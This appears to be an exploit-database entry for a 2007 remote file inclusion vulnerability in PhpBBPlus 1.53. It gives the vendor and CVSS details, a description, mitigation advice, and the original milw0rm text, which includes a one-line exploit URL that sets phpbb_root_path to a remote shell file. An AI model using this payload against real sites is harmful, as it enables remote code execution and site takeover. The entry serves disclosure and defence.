header-logo
Suggest Exploit
vendor:
PhpBBPlus
by:
Mehrad Ansari Targhi
7.5
CVSS
HIGH
RFI (Remote File Inclusion)
CWE
Product Name: PhpBBPlus
Affected Version From: PhpBBPlus 1.53
Affected Version To: PhpBBPlus 1.53
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

RFI Bug in PhpBBPlus

The RFI bug is present in the lang_main_album.php file of PhpBBPlus version 1.53. It can be exploited by appending a malicious URL as the value for the 'phpbb_root_path' parameter. This can allow an attacker to include remote files and potentially execute arbitrary code.

Mitigation:

The vendor should release a patch to fix the RFI vulnerability. In the meantime, users are advised to update to the latest version of PhpBBPlus and apply any available security patches. It is also recommended to implement proper input validation and sanitization to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

AUTHOR = Mehrad Ansari Targhi
E-Mail : mehrad1989@gmail.com
My Yahoo Messenger ID : mehrad_1989

Script Download URL : http://www.phpbbplus.net/PhpBBPlus1.53.zip

This Is A RFI Bug .
This Bug Is In : [ PHPBBPLUS INSTALLED ]/language/lang_german/lang
_main_album.php

Exploit : http://[PHPPLUS]/language/lang_german/lang_main_album.php?phpbb_root_path=[ http://shell.txt]?a=

# milw0rm.com [2007-09-20]

Navigation

Suggest Exploit

Services By CQR